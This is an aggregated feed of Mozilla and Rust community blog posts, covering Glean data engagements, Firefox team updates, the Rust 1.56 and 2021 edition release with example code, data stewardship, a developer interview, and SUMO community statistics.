Data@Mozilla: This Week in Glean: The Three Roles of Data Engagements

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index.

I’ve just recently started my sixth year working at Mozilla on data and data-adjacent things. In those years I’ve started to notice some patterns in how data is approached, so I thought I’d set them down in a TWiG because Glean’s got a role to play in them.

Data Engagements

A Data Engagement is when there’s a question that needs to engage with data to be answered. Something like “How many bookmarks are used by Firefox users?”.

(No one calls these Data Engagements but me, and I only do because I need to call them _something_.)

I’ve noticed three roles in Data Engagements at Mozilla:

  1. Data Consumer: The Question-Asker. The Temperature-Taker. This is the one who knows what questions are important, and is frustrated without an answer until and unless data can be collected and analysed to provide it. “We need to know how many bookmarks are used to see if we should invest more in bookmark R&D.”
  2. Data Analyst: The Answer-Maker. The Stats-Cruncher. This is the one who can use Data to answer a Consumer’s Question. “Bookmarks are used by Canadians more than Mexicans most of the time, but only amongst profiles that have at least one bookmark.”
  3. Data Instrumentor: The Data-Digger. The Code-Implementor. This one can sift through product code and find the correct place to collect the right piece of data. “The Places database holds many things, we’ll need to filter for just bookmarks to count them.”


(diagrams courtesy of :brizental)

It’s through these three working in concert — The Consumer having a question that the Instrumentor instruments to generate data the Analyst can analyse to return an answer back to the Consumer — that a Data Engagement succeeds.

At Mozilla, Data Engagements succeed very frequently in certain circumstances. The Graphics team answers many deeply-technical questions about Firefox running in the wild to determine how well WebRender is working. The Telemetry team examines the health of the data collection system as a whole. Mike Conley’s old Tab Switcher Dashboard helped find and solve performance regressions in (unsurprisingly) Tab Switching. These go well, and there’s a common thread here that I think is the secret of why:

In these and the other high-success-rate Data Engagements, all three roles (Consumer, Analyst, and Instrumentor) are embodied by the same person.


It’s a common problem in the industry. It’s hard to build anything at all, but it’s least hard to build something for yourself. When you yourself are the Question-Asker, Answer-Maker, and Data-Digger, you rarely dig up the wrong data and produce an answer to a question other than the one you had in mind. And when you do make a mistake (because, remember, this is hard), you can go back in and change the instrumentation, update the analysis, or reword the question.

But when these three roles are in different parts of the org, or different parts of the planet, things get harder. Each role is now trying to speak the others’ languages and infer enough context to do their jobs independently.

In comes the Data Org at Mozilla, which has had great successes to date on the theme of “Making it easier for anyone to be their own Analyst”. Data Democratization. When you’re your own Analyst, there are fewer situations where the roles are disparate: Instrumentors who are their own Analysts know when data won’t be the right shape to answer their own questions, and Consumers who are their own Analysts know when their questions aren’t well-formed.

Unfortunately we haven’t had as much success in making the other roles more accessible. Everyone can theoretically be their own Consumer: curiosity in a data-rich environment is as common as lanyards at an industry conference[1]. Asking _good_ questions is hard, though. Possible, but hard. You could just about imagine someone in a mature data organization becoming able to tell the difference between questions that are important and questions that are just interesting through self-serve tooling and documentation.

As for being your own Instrumentor… that is something that only a small fraction of folks have the patience to do. I (and Mozilla’s Community Managers) welcome you to try: it is possible to download and build Firefox yourself. It’s possible to find out which part of the codebase controls which pieces of UI. It’s… well, it’s more than possible, it’s actually quite pleasant to add instrumentation using Glean… but on the whole, if you are someone who _can_ Instrument Firefox Desktop you probably already have a copy of the source code on your hard drive. If you check right now and it’s not there, then there’s precious little likelihood that will change.

(Unless you come and work for Mozilla, that is.)

So let’s assume for now that democratizing instrumentation is impossible. Why does it matter? Why should it matter that the Consumer is a separate person from the Instrumentor?

Communication

Each role communicates with the other roles in a different language:

  • Consumers talk to Instrumentors and Analysts in units of Questions and Answers. “How many bookmarks are there? We need to know whether people are using bookmarks.”
  • Analysts speak Data, Metadata, and Stats. “The median number of bookmarks is, according to a representative sample of Firefox profiles, twelve (confidence interval 99.5%).”
  • Instrumentors speak Data and Code. “There are a few ways we delete bookmarks; we should cover them all to make sure the count’s correct when the next ping’s sent.”

Some more of the Data Org’s and Mozilla’s greatest successes involve supplying context at the points in a Data Engagement where it’s most needed. We’ve gotten exceedingly good at loading context about data (metadata) to facilitate communication between Instrumentors and Analysts with tools like the Glean Dictionary.

Ah, but once again the weak link appears to be the communication of Questions and Answers between Consumers and Instrumentors. Taking the above example, does the number of bookmarks include folders?

The Consumer knows, but the further away they sit from the Instrumentor, the less likely that the data coming from the product and fueling the analysis will be the “correct” one.

(Either including or excluding folders would be “correct” for different cases. Which one do you think was “more correct”?)

So how do we improve this?

Glean

Well, actually, Glean doesn’t have a solution for this. I don’t actually know what the solutions are. I have some ideas. Maybe we should share more context between Consumers and Instrumentors somehow. Maybe we should formalize the act of question-asking. Maybe we should build into the Glean SDK a high-enough level of metric abstraction that instead of asking questions, Consumers learn to speak a language of metrics.

The one thing I do know is that Glean is absolutely necessary to making any of these solutions possible. Without Glean, we have too many systems that are fractally complex for any context to be relevantly shared. How can we talk about sharing context about bookmark counts when we aren’t even counting things consistently[2]?

Glean brings that consistency. And from there we get to start solving these problems.

Expect me to come back to this realm of Engagements and the Three Roles in future posts. I’ve been thinking about:

  • how tooling affects the languages the roles speak amongst themselves and between each other,
  • how the roles are distributed on the org chart,
  • which teams support each role,
  • how Data Stewardship makes communication easier by adding context and formality,
  • how Telemetry and Glean handle the same situations in different ways, and
  • what roles Users play in all this. No model about data is complete without considering where the data comes from.

I’m not sure how many I’ll actually get to, but at least I have ideas.

:chutten

[1] Other rejected similes include “as common as”: maple syrup on Canadian breakfast tables, frustration in traffic, sense isn’t.

[2] Counting is harder than it looks.

(( This post is a syndicated copy of the original. ))

Firefox Nightly: These Weeks in Firefox: Issue 102

Highlights

Friends of the Firefox team
Fixed more than one bug

  • Itiel

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons

  • Fixed a bug related to the addon descriptions not being localized as expected when switching the browser to a different locale – Bug 1712024
  • Introduced a new “extensions.logging.productaddons.level” about:config pref to control log level related to GMP updates independently from the general AddonManager/XPIProvider logging level – Bug 1733670  

WebExtensions Framework

WebExtension APIs

  • Starting from Firefox 94, a new partitionKey property is being introduced in the cookies API. This new property is meant to help extensions better handle cookies partitioned by the dFPI feature

Downloads Panel

  • Many tests being addressed and fixed with improvements pref enabled (ticket)
  • [kpatenio] New context menu item being worked on for new pref (ticket)

Fission

  • The Fission experiment on Release has concluded, and the data science team is now analyzing the data. So far, nothing has jumped out to us showing stability or performance issues.
  • Barring any serious issues in the data analysis, the plan is to slowly roll out Fission to more release channel users in subsequent releases.

Fluent

Password Manager 

Performance

  • dthayer landed a fix that improves scaling of iframes with Fission enabled
  • mconley helped harry find a solution for a white flash that can occur when a theme is applied to about:home during the first boot
  • Special shout-out to zombie from the WebExtensions team for helping to reduce Base Content JS memory usage by 3-4% on all desktop platforms!
  • We’re starting to get numbers back on how the Fluent migrations have been impacting startup:
    • There appears to be evidence that the localization cycle for the first window is ~32% faster for the 95th percentile of users on Nightly, and ~12% faster for the 75th percentile.
    • Subsequent new windows see localization cycle improvements of ~12% for the 95th percentile
    • TL;DR: Removing DTDs from the main windows has improved startup time and new window opening for some of the slowest machines in our user pool.

Performance Tools

  • Isolated web content processes now display eTLD+1 of their origin in the Firefox Profiler timeline when Fission is enabled.
(Before/after screenshots: prior to Fission, web content processes did not display their origin in the Firefox Profiler; with Fission enabled, the origin of each web content process is now visible.)

  • The Gecko profiler Rust marker API has landed. It’s now possible to add a profiler marker from Rust to annotate a part of the code. See the gecko-profiler crate for more information. Documentation is also coming soon.

Search and Navigation

  • Daisuke has replaced the DDG icon with a higher-quality one. Bug 1731538
  • Thanks to Antonin Loubiere for contributing a patch that makes ESC actually undo changes in the separate search bar instead of doing nothing, more in line with how the address bar behaves. Bug 350079

Screenshots

  • Thanks again to module owner Emma whose last day was Friday. Sam Foster will take over as module owner. 
  • niklas is working on bug 1714234, which fixes screenshot test issues when copying an image to the clipboard.

The Rust Programming Language Blog: Announcing Rust 1.56.0 and Rust 2021

The Rust team is happy to announce a new version of Rust, 1.56.0. This stabilizes the 2021 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.56.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.56.0 on GitHub.

What's in 1.56.0 stable

Rust 2021

We wrote about plans for the Rust 2021 Edition in May. Editions are a mechanism for opt-in changes that may otherwise pose backwards compatibility risk. See the edition guide for details on how this is achieved. This is a smaller edition, especially compared to 2018, but there are still some nice quality-of-life changes that require an edition opt-in to avoid breaking some corner cases in existing code. See the new chapters of the edition guide below for more details on each new feature and guidance for migration.

Disjoint capture in closures

Closures automatically capture values or references to identifiers that are used in the body, but before 2021, they were always captured as a whole. The new disjoint-capture feature will likely simplify the way you write closures, so let's look at a quick example:

// 2015 or 2018 edition code
let a = SomeStruct::new();

// Move out of one field of the struct
drop(a.x);

// Ok: Still use another field of the struct
println!("{}", a.y);

// Error: Before 2021 edition, tries to capture all of `a`
let c = || println!("{}", a.y);
c();

To fix this, you would have had to extract something like let y = &a.y; manually before the closure to limit its capture. Starting in Rust 2021, closures will automatically capture only the fields that they use, so the above example will compile fine!

This new behavior is only activated in the new edition, since it can change the order in which fields are dropped. As with all edition changes, an automatic migration is available, which will update your closures where this matters by inserting let _ = &a; inside the closure to force the entire struct to be captured as before.
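
To make that concrete, here's roughly what a migrated closure looks like (a sketch based on the description above, not literal output from the tooling):

// 2021 edition, after `cargo fix --edition` has run
let a = SomeStruct::new();
let c = || {
    let _ = &a; // inserted by the migration to capture all of `a`, preserving the 2018 drop order
    println!("{}", a.y);
};
c();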

Migrating to 2021

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2021!
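
Concretely, the usual flow looks something like this (a paraphrase of the edition guide's steps, not an exhaustive recipe):

cargo fix --edition     # apply machine-applicable changes while still on the old edition
# then bump `edition = "2021"` (and optionally `rust-version`) in Cargo.toml
cargo build             # rebuild to confirm everything compiles on the new edition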

However small this edition appears on the surface, it's still the product of a lot of hard work from many contributors: see our dedicated celebration and thanks tracker!

Cargo rust-version

Cargo.toml now supports a [package] rust-version field to specify the minimum supported Rust version for a crate, and Cargo will exit with an early error if that is not satisfied. This doesn't currently influence the dependency resolver, but the idea is to catch compatibility problems before they turn into cryptic compiler errors.
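
For example, a minimal Cargo.toml using the new field might look like this (the crate name and version are placeholders):

[package]
name = "my-crate"
version = "0.1.0"
edition = "2021"
rust-version = "1.56"   # Cargo exits with an early error on older toolchains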

New bindings in binding @ pattern

Rust pattern matching can be written with a single identifier that binds the entire value, followed by @ and a more refined structural pattern, but this has not allowed additional bindings in that pattern -- until now!

struct Matrix {
    data: Vec<f64>,
    row_len: usize,
}

// Before, we need separate statements to bind
// the whole struct and also read its parts.
let matrix = get_matrix();
let row_len = matrix.row_len;
// or with a destructuring pattern:
let Matrix { row_len, .. } = matrix;

// Rust 1.56 now lets you bind both at once!
let matrix @ Matrix { row_len, .. } = get_matrix();
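
The same binding form works in match arms as well. A small illustrative sketch, reusing the Matrix type above (the arms themselves are invented):

match get_matrix() {
    // Bind the whole value as `m` while also matching and binding its parts
    m @ Matrix { row_len: 0, .. } => println!("degenerate matrix with {} values", m.data.len()),
    m @ Matrix { row_len, .. } => println!("{} rows of {} values", m.data.len() / row_len, row_len),
}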

This actually was allowed in the days before Rust 1.0, but that was removed due to known unsoundness at the time. With the evolution of the borrow checker since that time, and with heavy testing, the compiler team determined that this was safe to finally allow in stable Rust!

Stabilized APIs

The following methods and trait implementations were stabilized.

The following previously stable functions are now const.

Other changes

There are other changes in the Rust 1.56.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.56.0

Many people came together to create Rust 1.56.0 and the 2021 edition. We couldn't have done it without all of you. Thanks!

Mark Surman: Exploring better data stewardship at Mozilla

Over the last few years, Mozilla has increasingly turned its attention to the question of ‘how do we build more trustworthy AI?’ Data is at the core of this question. Who has our data? What are they using it for? Do they have my interests in mind, or only their own? Do I trust them?

We decided earlier this year that ‘better data stewardship’ should be one of the three big areas of focus for our trustworthy AI work.

One part of this focus is supporting the growing field of people working on data trusts, data cooperatives and other efforts to build trust and shift power dynamics around data. In partnership with Luminate and Siegel, we launched the Mozilla Data Futures Lab in March as a way to drive this part of the work.

At the same time, we have started to ask ourselves: how might Mozilla itself explore and use some of these new models of responsible data governance? We have long championed more responsible use of data, with everything we do living up to the Mozilla Lean Data Practices. The question is: are there ways we can go further? Are there ways we can more actively engage with people around their data that builds trust — and that helps the tech industry shift the way it thinks about and uses data?

This post includes some early learning on these questions. The TLDR: 1. the list of possible experiments is compelling — and vast; and 2. we should start small, looking at how emerging data governance models might apply to areas where we already use data in our products and programs.

Digging into more detail: we started looking at these questions in 2020 by asking two leading experts — Sarah Gold from Projects by IF and Sean McDonald from Digital Public — to generate hypothetical scenarios where Mozilla deployed radically new approaches to data governance. These scenarios included three big ideas:

  • Collective Rights Representation: Mozilla could represent the data rights of citizens collectively, effectively forming a ‘data union’. This could include negotiating better terms of service or product improvements, or enforcing rights held under regimes like GDPR or CCPA.
  • Data Donation Trust: As Mozilla projects like Rally, Regrets Reporter and Common Voice demonstrate, there can be great power in citizens coming together to donate and aggregate their data. We could take these platforms further by creating a data trust or coop to actively steward and create collective value from this data over time.
  • Consent Management via a Privacy Assistant: a digital assistant powered by a data trust could mediate between citizens and tech companies, handling real time ‘negotiations’ about how their data is used. This would give users more control — and ultimately more leverage over how individuals and companies manage data.

Other scenarios included Mozilla as a consumer steward, creating and building an advocacy infrastructure platform, or managing an industry association. Sarah and Sean have each written up their work and shared it in these blog posts: Bringing better data stewardship to life; and A Couch-to-5K Plan for Digital Governance.

This reflective process was at once exciting and sobering. The ideas are compelling — and include things we might do one day (and that we’re even doing now in small ways). But, by their nature, they are without context, leadership or products. Reading these scenarios, the path from a ‘big data governance idea’ to something real in the world wasn’t at all clear to us.

As Sean pointed out in his post: “There isn’t ‘a’ way to design data governance – as a system or as a commercial offering. Beyond this point, the process relies a lot on context, and the unique value a person or organization brings to a process.”

For me, this was really the key ‘aha’ (even though it should have been obvious). We need to start from the places where we have data and context and leaders — not from big ideas. With this in mind, Mozilla Foundation Data Lead, Jackie Lu, and Data Futures Lab Lead, Champika Fernando, have offered to take over this internal exploration by identifying practical ways Mozilla can improve the ways we collect and use data today.

They will begin this work later this year with a review of data governance practices and open questions within Mozilla Foundation, where our trustworthy AI work is housed. This will include a look at data-centric projects like Common Voice and YouTube Regrets Reporter as well as programs like online campaigning and MozFest that rely heavily on the Foundation’s CRM. This work explores questions like: what would it look like for Mozilla Foundation to more fully “walk the talk” when it comes to data stewardship? And, what kind of processes might we need to put in place, to have our own organization’s use of data be a learning opportunity for how we shift power back to people, and imagine new ways to act collectively through, and with, our data? They are starting to explore those questions and more.

In parallel, the Data Futures Lab and Mozilla’s Insights team will be working on a Legal and Policy Playbook for Builders outlining existing regulatory opportunities that can be leveraged for experimentation across the field in various jurisdictions. While the primary audience of this work is external, we will also look at whether there are ways to apply these practices to the Mozilla Foundation’s work internally.

Personally, I believe that new models of responsible data governance have huge potential to shift technology, society and our economy — much like open source and the open web shifted things 20 years ago. I also think that the path to this shift will be driven by people who just start building things differently, inventing new models and shifting power as they go. I’m hoping that looking at new, more responsible ways to steward data everyday will set Mozilla up to again play a significant role in this kind of innovation and change.

This is part one of a four-part series on how we approach data at Mozilla. Read the others here: Part 2; Part 3; Part 4.

The post Exploring better data stewardship at Mozilla appeared first on Mark Surman.

Hacks.Mozilla.Org: Hacks Decoded: Thomas Park, Founder of Codepip

Welcome to our Hacks: Decoded Interview series!

Once a month, Mozilla Foundation’s Xavier Harding speaks with people in the tech industry about where they’re from, the work they do and what drives them to keep going forward. Make sure you follow Mozilla’s Hacks blog to find more articles in this series and make sure to visit the Mozilla Foundation site to see more of our org’s work. 

Meet Thomas Park 

Thomas Park is a software developer based in the U.S. (Philadelphia, specifically). Previously, he was a teacher and researcher at Drexel University and even worked at Mozilla Foundation for a stint. Now, he’s the founder of Codepip, a platform that offers games that teach players how to code. Park has made a couple games himself: Flexbox Froggy and Grid Garden.

We spoke with Thomas over email about coding, his favourite apps and his past life at Mozilla. Check it out below and welcome to Hacks: Decoded.

Where’d you get your start, Thomas? How did you end up working in tech, what was the first piece of code you wrote, what’s the Thomas Park origin story?

The very first piece of code I wrote was in elementary school. We were introduced to Logo, an educational programming language that was used to draw graphics with a turtle (a little cursor that was shaped like the animal). I drew a rudimentary weapon that shot an animated laser beam, with the word “LAZER” misspelled under it.

Afterwards, I took an extremely long hiatus from coding. Dabbled with HyperCard and HTML here and there, but didn’t pick it up in earnest until college.

Post-college, I worked in the distance education department at the Center for Talented Youth at Johns Hopkins University, designing and teaching online courses. It was there I realized how much the technology we used mediated the experience of our students. I also realized how much better the design of this tech should be. That motivated me to go to grad school to study human-computer interaction, with a focus on educational technology. I wrote a decent amount of code to build prototypes and analyze data during my time there.

What is Codepip? What made you want to create it? 

Codepip is a platform I created for coding games that help people learn HTML, CSS, JavaScript, etc. The most popular game is Flexbox Froggy.

Codepip actually has its roots in Mozilla. During grad school, I did an internship with the Mozilla Foundation. At the time, they had a code editor geared toward teachers and students called Thimble. For my internship, I worked with Mozilla employees to integrate a tutorial feature into Thimble.

Anyway, through this internship I got to attend Mozilla Festival. And there I met many people who did brilliant work inside and outside of Mozilla. One was an extremely talented designer named Luke Pacholski. By that time, he had created CSS Diner, a game about CSS selectors. And we got to chatting about other game ideas.

After I returned from MozFest, I worked weekends for about a month to create Flexbox Froggy. I was blown away by the reception, from both beginners who wanted to learn CSS, to more experienced devs curious about this powerful new CSS module called flexbox. To me, this affirmed that coding games could make a good complement to more traditional ways of learning. Since then, I’ve made other games that touch on CSS grid, JS math, HTML shortcuts with Emmet, and more.

Gamified online learning has become quite popular in the past couple of years, what are some old school methods that you still recommend and use?

Consulting the docs, if you can call that old school. I often visit the MDN Web Docs to learn some aspect of CSS or JS. The articles are detailed, with plenty of examples.

On occasion I find myself doing a deep dive into the W3C standards, though navigating the site can be tricky.

Same goes for any third-party library or framework you’re working with — read the docs!

What’s one thing you wish you knew when you first started to code?

I wish I knew git when I first started to code. Actually, I wish I knew git now.

It’s never too early to start version controlling your projects. Sign up for a free GitHub account, install GitHub’s client or learn a handful of basic git commands, and backup your code. You can opt for your code to be public if you’re comfortable with it, private if not. There’s no excuse.

Plus, years down the line when you’ve mastered your craft, you can get some entertainment value from looking back at your old code.

Whose work do you admire right now? Who should more people be paying attention to?

I’m curious how other people answer this. I feel like I’m out of the loop on this one.

But since you asked, I will say that when it comes to web design with high stakes, the teams at Stripe and Apple have been the gold standard for years. I’ll browse their sites and get inspired by the many small, almost imperceptible details that add up to something magical. Or something in your face that blows my mind.

On a more personal front, there’s the art of Diana Smith and Ben Evans, which pushes the boundaries of what’s possible with pure CSS. I love how Lynn Fisher commits to weird side projects. And I admire the approachability of Josh Comeau’s writings on technical subjects.

What’s a part of your journey that many may not realize when they look at your resume or LinkedIn page?

My resume tells a cohesive story that connects the dots of my education and employment. As if there was a master plan that guided me to where I am.

The truth is I never had it all figured out. I tried some things I enjoyed, tried other things which I learned I did not, and discovered whole new industries that I didn’t even realize existed. On the whole, the journey has been rewarding, and I feel fortunate to be doing work right now that I love and feel passionate about. But that took time and is subject to change.

Some beginners may feel discouraged that they don’t have their career mapped out from A to Z, like everyone else seemingly does. But all of us are on our own journeys of self-discovery, even if the picture we paint for prospective employers, or family and friends, is one of a singular path.

What’s something you’ve realized since we’ve been in this pandemic? Tech-related or otherwise?

Outside of tech, I’ve realized how grateful I am for all the healthcare workers, teachers, caretakers, sanitation workers, and food service workers who put themselves at risk to keep things going. At times I got a glimpse of what happens without them and it wasn’t pretty.

Tech-related, the pandemic has accelerated a lot of tech trends by years or even decades. Not everything is as stark as, say, Blockbuster getting replaced by Netflix, but industries are irreversibly changing and new technology is making that happen. It really underscores how in order to survive and flourish, we as tech workers have to always be ready to learn and adapt in a fast-changing world.

Okay a random one — you’re stranded on a desert island with nothing but a smartphone. Which three apps could you not live without?

Assuming I’ll be stuck there for a while, I’d definitely need my podcasts. My podcast app of choice has long been Overcast. I’d load it up with some 99% Invisible and Planet Money. Although I’d probably only need a single episode of Hardcore History to last me before I got rescued.

I’d also have Simplenote for all my note-taking needs. When it comes to notes, I prefer the minimalist, low-friction approach of Simplenote to manage my to-dos and projects. Or count days and nights in this case.

Assuming I have bars, my last app is Reddit. The larger subs get most of the attention, but there are plenty of smaller ones with strong communities and thoughtful discussion. Just avoid the financial investing advice from there.

Last question — what’s next for you?

I’m putting the finishing touches on a new coding game called Disarray. You play a cleaning expert who organizes arrays of household objects using JavaScript methods like push, sort, splice, and map, sparking joy in the homeowner.

And planning for a sequel. Maybe a game about databases…

Thomas Park is a software developer living in Philly. You can keep up with his work right here and keep up with Mozilla on Twitter and Instagram. Tune into future articles in the Hacks: Decoded series on this very blog.

The post Hacks Decoded: Thomas Park, Founder of Codepip appeared first on Mozilla Hacks - the Web developer blog.

This Week In Rust: This Week in Rust 413

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is serde_with, a crate of helper macros to ease implementing serde traits for your types.
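
As a small illustrative sketch of the kind of helper it provides (the struct and field here are invented for the example):

use serde::{Deserialize, Serialize};
use serde_with::{serde_as, DisplayFromStr};

#[serde_as] // must be placed before the derive
#[derive(Serialize, Deserialize)]
struct Record {
    // (De)serialize this u64 as a string like "12345" instead of a JSON number.
    #[serde_as(as = "DisplayFromStr")]
    id: u64,
}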

Thanks to piegames for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

353 pull requests were merged in the last week

Rust Compiler Performance Triage

A week where improvements outweigh regressions. The highlight of the week is the change to split out LLVM profile guided optimization (PGO) and using clang 13 to compile LLVM which led to improvements in many real world crates (e.g., cargo) in the range of 10%. Most regressions were limited and at most in the less than 1% range. We are seeing more performance changes in rollups which are supposed to be performance neutral. We'll have to decide how to best address this.

Triage done by @rylev. Revision range: 9475e609..d45ed750

3 Regressions, 4 Improvements, 2 Mixed; 2 of them in rollups; 34 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Modeldrive

Connected Cars

Bytewax

Timescale

Immunant

Nexthink

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The biggest failure in Rust’s communication strategy has been the inability to explain to non-experts that unsafe abstractions are the point, not a sign of failure.

withoutboats on twitter

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Chris H-C: Six-Year Moziversary

I’ve been working at Mozilla for six years today. Wow.

Okay, so what’s happened… I’ve been promoted to Staff Software Engineer. Georg and I’d been working on that before he left, and then, well *gestures at everything*. This means it doesn’t really _feel_ that different to be a Staff instead of a Senior since I’ve been operating at the latter level for over a year now, but it’s nice that the title caught up. Next stop: well, actually, I think Staff’s a good place for now.

Firefox On Glean did indeed take my entire 2020 at work, and did complete on time and on budget. Glean is now available to be used in Firefox Desktop.

My efforts towards getting folks to actually _use_ Glean instead of Firefox Telemetry in Firefox Desktop have been mixed. The Background Update Task work went exceedingly well… but when there’s 2k pieces of instrumentation, you need project management and I’m trying my best. Now to “just” get buy-in from the powers that be.

I delivered a talk to Ubisoft (yeah, the video game folks) earlier this year. That was a blast and I’m low-key looking for another opportunity like it. If you know anyone who’d like me to talk their ears off about Data and Responsibility, do let me know.

Blogging’s still low-frequency. I rely on the This Week in Glean rotation to give me the kick to actually write long-form ideas down from time-to-time… but it’s infrequent. Look forward to an upcoming blog post about the Three Roles in Data Engagements.

Predictions for the future time:

  • There will be at least one Work Week planned if not executed by this time next year. Vaccines work.
  • Firefox Desktop will have at least started migrating its instrumentation to Glean.
  • I will still be spending a good chunk of my time coding, though I expect this trend of spending ever more time writing proposals and helping folks on chat will continue.

And that’s it for me for now.

:chutten

The Mozilla Blog: Welcome Imo Udom, Mozilla’s new Senior Vice President, Innovation Ecosystems

I am delighted to share that Imo Udom has joined Mozilla as Senior Vice President, Innovation Ecosystems. Imo brings a unique combination of strategy, technical and product expertise and an entrepreneurial spirit to Mozilla and our work to design, develop and deliver new products and services. 

While Mozilla is no stranger to innovation, this role is a new and exciting one for us. Imo’s focus won’t only be on new products that complement the work already happening in each of our product organizations, but also on creating the right systems to nurture new ideas within Mozilla and with like-minded people and organizations outside the company. I’m convinced that our brightest future comes from a combination of the products we offer directly and our connection to a broad ecosystem of creators, founders, and entrepreneurs in the world who are also trying to build a better internet. 

“People deserve technology that not only makes their lives better and easier, but technology that they can trust,” said Udom. “Mozilla is one of the few companies already doing this work through its core products. I am thrilled to join the team to help Mozilla and others with the same mission build next generation products that bring people the best of modern technology while still keeping their best interests at the center.”

Previously, Imo was the Chief Strategy and Product Officer at Outmatch where he was responsible for ensuring the business and product strategy delivered value to customers, while never losing sight of its mission to match people with purpose. Prior to Outmatch, Imo co-founded and served as CEO of Wepow, a video interviewing solution that reduces interviewing time and improves hiring quality. Imo helped grow Wepow from a small side-project in 2010 to a successful enterprise platform supporting hundreds of global brands that was later acquired by Outmatch. 

Beyond Imo’s impressive experience and background, it was his passion for learning and commitment to impacting the world in a positive way that made it clear that he was the right person for this work. Imo will report directly to me and will also sit on the steering committee. 

I look forward to working closely with Imo as we write the next chapter of innovation at Mozilla.

The post Welcome Imo Udom, Mozilla’s new Senior Vice President, Innovation Ecosystems appeared first on The Mozilla Blog.

Support.Mozilla.Org: What’s up with SUMO – October 2021

Hey folks,

As we enter October, I hope you’re all pumped up to welcome the last quarter of the year and, basically, wrapping up projects that we have for the remainder of the year. With that spirit, let’s start by welcoming the following folks into our community.

Welcome on board!

  1. Welcome to the support forum crazy.cat, Losa, and Zipyio!
  2. Also, welcome to Ihor from Ukraine, Static_salt from the Netherlands, as well as Eduardo and hcasellato from Brazil. Thanks for your contribution to the KB localization!

Community news

  • If you’ve been hearing about Firefox Suggest and are confused about what exactly is that, please read this contributor forum thread to find out more and join our discussion about it.
  • Last month, we welcomed Firefox Focus into the Play Store Support program. We connected the app to Conversocial so now, Play Store Support contributors should be able to reply to Google Play Store reviews for Firefox Focus from the tool. We also prepared this guideline on how to reply to the reviews.
  • Learn more about Firefox 93 here.
  • Another warm welcome for our new content manager, Abby Parise! She made a quick appearance in our community call last month. So go ahead and watch the call if you haven’t!
  • Check out the following release notes from Kitsune during the previous period:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in September!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

Month | Page views | vs. previous month
Sep 2021 | 8,244,817 | -2.57%
* KB pageviews number is the total of KB pageviews for /en-US/ only

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre Mozinet
  4. K_alex
  5. Julie

KB Localization

Top 10 locale based on total page views

Locale | Sep 2021 pageviews (*) | Localization progress (per Sep 14) (**)
de | 8.13% | 100%
zh-CN | 7.56% | 100%
fr | 6.59% | 88%
es | 6.10% | 39%
pt-BR | 5.96% | 60%
ja | 3.85% | 54%
ru | 3.77% | 100%
it | 2.22% | 100%
pl | 2.09% | 87%
zh-TW | 1.91% | 5%
* Locale pageviews is the overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized articles out of all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Valery Ledovskoy
  5. Soucet

Forum Support

Forum stats

Month | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Sep 2021 | 2274 | 85.31% | 24.32% | 65.89%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Seburo
  4. Jscher2000
  5. Sfhowes

Social Support

Twitter stats

Channel | Total conv (Sep 2021) | Conv interacted (Sep 2021)
@firefox | 3318 | 785
@FirefoxSupport | 290 | 240

Top 5 contributors in Q3 2021

  1. Christophe Villeneuve
  2. Felipe Koji
  3. Andrew Truong

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • FX Desktop 94 (Nov 2)
    • Monochromatic Themes (Personalize Fx by opting into a polished monochromatic theme from a limited set)
    • Avoid interruptions when closing Firefox
    • Fx Desktop addition to Windows App store
    • Video Playback testing on MacOS: (Decrease power consumption during full screen playback)

Firefox mobile

Major Release 2 Mobile (Nov 2)

Area Feature Android IOS Focus
Firefox Home Jump Back in (Open Tabs) X X
Recently saved/Reading List X
Recent bookmarks X X
Customize Pocket Articles X
Clutter Free Tabs Inactive Tabs X
Better Search History Highlights in Awesome bar X
Themes Settings Themes Settings X
